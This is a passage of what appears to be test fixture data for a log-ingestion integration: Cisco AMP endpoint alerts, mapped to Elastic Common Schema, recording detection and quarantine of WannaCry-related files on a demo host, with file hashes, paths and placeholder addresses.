2, + "ingested": "2021-09-12T17:32:10.094025345Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229331435815000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + 
"test_group_guid" + ], + "detection_id": "6419229331435814973", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "tasksche.exe", + "pid": 1008, + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "name": "u.wnry", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "hash": { + "sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "md5": "7bf2b57f2a205768755c07f238fb32cc" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094027258Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229331435815000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Ransom:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229331435814969", + "event_type_id": 1090519054 + } + }, + 
"tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094029167Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229331435815000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229331435814970", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + 
"user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094031077Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", 
+ "id": "6419229331435815000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Ransom:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229331435814968", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094032961Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419229327140847660", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": 
"2021-09-12T17:32:10.094035008Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419229327140847658", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": 
"2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094036925Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + 
"network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419229322845880359", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094038843Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229327140848000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229327140847671", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "cmd.exe", + "pid": 5748, + "hash": { + "sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "md5": "ad7b9c14083b52bc532fba5948342b98" + } + }, + "@timestamp": "2021-01-14T14:41:04.000Z", + "file": 
{ + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094040732Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229327140848000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + 
"test_group_guid" + ], + "detection_id": "6419229327140847666", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "tasksche.exe", + "pid": 4772, + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "@timestamp": "2021-01-14T14:41:04.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094042624Z", + "original": 